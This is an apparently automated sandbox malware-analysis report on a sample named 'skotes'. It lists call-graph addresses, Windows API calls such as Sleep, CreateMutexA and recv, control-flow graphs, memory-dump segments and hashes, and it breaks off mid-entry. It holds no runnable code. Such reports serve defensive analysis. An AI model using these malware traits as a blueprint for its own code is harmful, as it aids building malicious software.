shared_ptr 9671->9675 9672 70a953 Sleep CreateMutexA 9674 70a98e 9672->9674 9673->9672 9673->9675 10307 70215a 10308 71c6fc InitializeCriticalSectionEx 10307->10308 10309 702164 10308->10309 10141 709adc 10143 709aea shared_ptr 10141->10143 10142 70a917 10144 70a953 Sleep CreateMutexA 10142->10144 10143->10142 10146 709b4b shared_ptr 10143->10146 10145 70a98e 10144->10145 10147 705c10 3 API calls 10146->10147 10148 709b59 10146->10148 10149 709b7c 10147->10149 10156 708b30 10149->10156 10151 709b8d 10152 705c10 3 API calls 10151->10152 10153 709cb1 10152->10153 10154 708b30 3 API calls 10153->10154 10155 709cc2 10154->10155 10157 708b7c 10156->10157 10158 705c10 3 API calls 10157->10158 10160 708b97 shared_ptr 10158->10160 10159 708d01 shared_ptr std::invalid_argument::invalid_argument 10159->10151 10160->10159 10161 705c10 3 API calls 10160->10161 10163 708d9a shared_ptr 10161->10163 10162 708e7e shared_ptr std::invalid_argument::invalid_argument 10162->10151 10163->10162 10164 705c10 3 API calls 10163->10164 10165 708f1a shared_ptr std::invalid_argument::invalid_argument 10164->10165 10165->10151 10460 703f9f 10461 703fb6 10460->10461 10462 703fad 10460->10462 10463 702410 4 API calls 10462->10463 10463->10461 10115 702e00 10116 702e28 10115->10116 10119 71c68b 10116->10119 10122 71c3d5 10119->10122 10121 702e33 10123 71c3e1 10122->10123 10124 71c3eb 10122->10124 10125 71c3be 10123->10125 10126 71c39e 10123->10126 10124->10121 10135 71cd0a 10125->10135 10126->10124 10131 71ccd5 10126->10131 10129 71c3d0 10129->10121 10132 71cce3 InitializeCriticalSectionEx 10131->10132 10134 71c3b7 10131->10134 10132->10134 10134->10121 10136 71cd1f RtlInitializeConditionVariable 10135->10136 10136->10129 10166 702ec0 10167 702f06 10166->10167 10170 702f6f 10166->10170 10168 71c6ac GetSystemTimePreciseAsFileTime 10167->10168 10169 702f12 10168->10169 10172 70301e 10169->10172 10176 702f1d __Mtx_unlock 10169->10176 10171 702fef 10170->10171 10177 71c6ac GetSystemTimePreciseAsFileTime 10170->10177 10173 71c26a 4 API calls 10172->10173 10174 703024 10173->10174 10175 71c26a 4 API calls 10174->10175 10178 702fb9 10175->10178 10176->10170 10176->10174 10177->10178 10179 71c26a 4 API calls 10178->10179 10180 702fc0 __Mtx_unlock 10178->10180 10179->10180 10181 71c26a 4 API calls 10180->10181 10182 702fd8 10180->10182 10181->10182 10182->10171 10183 71c26a 4 API calls 10182->10183 10184 70303c 10183->10184 10185 71c6ac GetSystemTimePreciseAsFileTime 10184->10185 10188 703080 shared_ptr __Mtx_unlock 10185->10188 10186 70315f 10187 71c26a 4 API calls 10186->10187 10191 7031d1 10186->10191 10193 703193 __Mtx_unlock 10186->10193 10189 7031cb 10187->10189 10188->10186 10188->10189 10196 7031a7 std::invalid_argument::invalid_argument 10188->10196 10197 71c6ac GetSystemTimePreciseAsFileTime 10188->10197 10190 71c26a 4 API calls 10189->10190 10190->10191 10192 71c26a 4 API calls 10191->10192 10192->10193 10194 71c26a 4 API calls 10193->10194 10193->10196 10195 7031dd 10194->10195 10197->10186 10198 70e0c0 recv 10199 70e122 recv 10198->10199 10200 70e157 recv 10199->10200 10202 70e191 10200->10202 10201 70e2b3 std::invalid_argument::invalid_argument 10202->10201 10203 71c6ac GetSystemTimePreciseAsFileTime 10202->10203 10204 70e2ee 10203->10204 10205 71c26a 4 API calls 10204->10205 10206 70e358 10205->10206 10464 708980 10466 708aea 10464->10466 10467 7089d8 shared_ptr 10464->10467 10465 705c10 3 API calls 10465->10467 10467->10465 10467->10466 10310 709f44 10311 709f4c shared_ptr 10310->10311 10312 70a953 Sleep CreateMutexA 10311->10312 10314 70a01f shared_ptr 10311->10314 10313 70a98e 10312->10313 10210 71d0c7 10212 71d0d7 10210->10212 10211 71d17f 10212->10211 10213 71d17b RtlWakeAllConditionVariable 10212->10213 10032 703c47 10033 703c51 10032->10033 10036 703c5f 10033->10036 10039 7032d0 10033->10039 10034 703c68 10036->10034 10056 703810 10036->10056 10060 71c6ac 10039->10060 10042 703314 10043 70333c __Mtx_unlock 10042->10043 10063 71c26a 10042->10063 10044 71c26a 4 API calls 10043->10044 10045 703350 std::invalid_argument::invalid_argument 10043->10045 10046 703377 10044->10046 10045->10036 10047 71c6ac GetSystemTimePreciseAsFileTime 10046->10047 10048 7033af 10047->10048 10049 71c26a 4 API calls 10048->10049 10050 7033b6 10048->10050 10049->10050 10051 71c26a 4 API calls 10050->10051 10052 7033d7 __Mtx_unlock 10050->10052 10051->10052 10053 71c26a 4 API calls 10052->10053 10054 7033eb 10052->10054 10055 70340e 10053->10055 10054->10036 10055->10036 10057 70381c 10056->10057 10094 702440 10057->10094 10067 71c452 10060->10067 10062 71c6b9 10062->10042 10064 71c292 10063->10064 10065 71c274 10063->10065 10064->10064 10065->10064 10084 71c297 10065->10084 10068 71c4a8 10067->10068 10070 71c47a std::invalid_argument::invalid_argument 10067->10070 10068->10070 10073 71cf6b 10068->10073 10070->10062 10071 71c4fd __Xtime_diff_to_millis2 10071->10070 10072 71cf6b _xtime_get GetSystemTimePreciseAsFileTime 10071->10072 10072->10071 10074 71cf7a 10073->10074 10076 71cf87 __aulldvrm 10073->10076 10074->10076 10077 71cf44 10074->10077 10076->10071 10080 71cbea 10077->10080 10081 71cc07 10080->10081 10082 71cbfb GetSystemTimePreciseAsFileTime 10080->10082 10081->10076 10082->10081 10087 702ae0 10084->10087 10086 71c2ae Concurrency::cancel_current_task 10088 71bedf InitOnceExecuteOnce 10087->10088 10089 702af4 __dosmaperr 10088->10089 10089->10086 10090 73a671 __cftof 3 API calls 10089->10090 10093 736ccc 10090->10093 10091 738bec __cftof 3 API calls 10092 736cf6 10091->10092 10093->10091 10097 71b5d6 10094->10097 10096 702472 10099 71b5f1 Concurrency::cancel_current_task 10097->10099 10098 738bec __cftof 3 API calls 10100 71b69f 10098->10100 10099->10098 10101 71b658 __cftof std::invalid_argument::invalid_argument 10099->10101 10101->10096 10102 736a44 10103 736a5c 10102->10103 10104 736a52 10102->10104 10107 73698d 10103->10107 10106 736a76 ___free_lconv_mon 10108 73690a __cftof 3 API calls 10107->10108 10109 73699f 10108->10109 10109->10106 10268 703c8e 10269 703c98 10268->10269 10270 702410 4 API calls 10269->10270 10271 703ca5 10269->10271 10270->10271 10272 703810 3 API calls 10271->10272 10273 703ccf 10272->10273 10274 703810 3 API calls 10273->10274 10275 703cdb shared_ptr 10274->10275

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 0073652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 351 73652b-736538 call 73a302 354 73655a-73656c call 73656d ExitProcess 351->354 355 73653a-736548 GetPEB 351->355 355->354 357 73654a-736559 355->357 357->354
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,0073652A,?,?,?,?,?,00737661), ref: 00736567
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                • Opcode ID: eeead8ab4a025f1581d389124f139f761112fbd88d6d008daa6cbc04fd98f1af
                                                                                                                                                                                                • Instruction ID: ac92c78a6e6062a1c2a076d0632b9748b7d0905c7d3189d96854563617284f61
                                                                                                                                                                                                • Opcode Fuzzy Hash: eeead8ab4a025f1581d389124f139f761112fbd88d6d008daa6cbc04fd98f1af
                                                                                                                                                                                                • Instruction Fuzzy Hash: 06E08C31140208BEDF25BB68C80DD483B69EB51741F109820F9194622BCB29EE91CA80
                                                                                                                                                                                                Function 00709BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 61ea17d84e5431b4d4b8c3f3a59b57b5e6eddce3e4072ffb978a28207c0052cb
                                                                                                                                                                                                • Instruction ID: 5b5fe37502681c9c5c6dd892de8d7e6080547387f992e731cb62a8fc0519363f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ea17d84e5431b4d4b8c3f3a59b57b5e6eddce3e4072ffb978a28207c0052cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34313771B10204DBEB089B78DD8D7AEB6A2AB85320F208318E1149B3D7D77D59808661
                                                                                                                                                                                                Function 00709F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 22 709f44-709f64 26 709f92-709fae 22->26 27 709f66-709f72 22->27 30 709fb0-709fbc 26->30 31 709fdc-709ffb 26->31 28 709f74-709f82 27->28 29 709f88-709f8f call 71d663 27->29 28->29 32 70a92b 28->32 29->26 34 709fd2-709fd9 call 71d663 30->34 35 709fbe-709fcc 30->35 36 70a029-70a916 call 7180c0 31->36 37 709ffd-70a009 31->37 41 70a953-70a994 Sleep CreateMutexA 32->41 42 70a92b call 736c6a 32->42 34->31 35->32 35->34 38 70a00b-70a019 37->38 39 70a01f-70a026 call 71d663 37->39 38->32 38->39 39->36 51 70a996-70a998 41->51 52 70a9a7-70a9a8 41->52 42->41 51->52 54 70a99a-70a9a5 51->54 54->52
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 83fba698a29800fd53ab93c3b0c48d1454d577ab8bed0130a9656a74883b0d3c
                                                                                                                                                                                                • Instruction ID: a15134e589edb299cc81fe55362e20a506ba453e28ba8fe867133079bf7e9b62
                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fba698a29800fd53ab93c3b0c48d1454d577ab8bed0130a9656a74883b0d3c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04315B31710205EBEB18DB78DD8C7ADB7A2EB85310F248719E114EB2D6E77D59808752
                                                                                                                                                                                                Function 0070A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
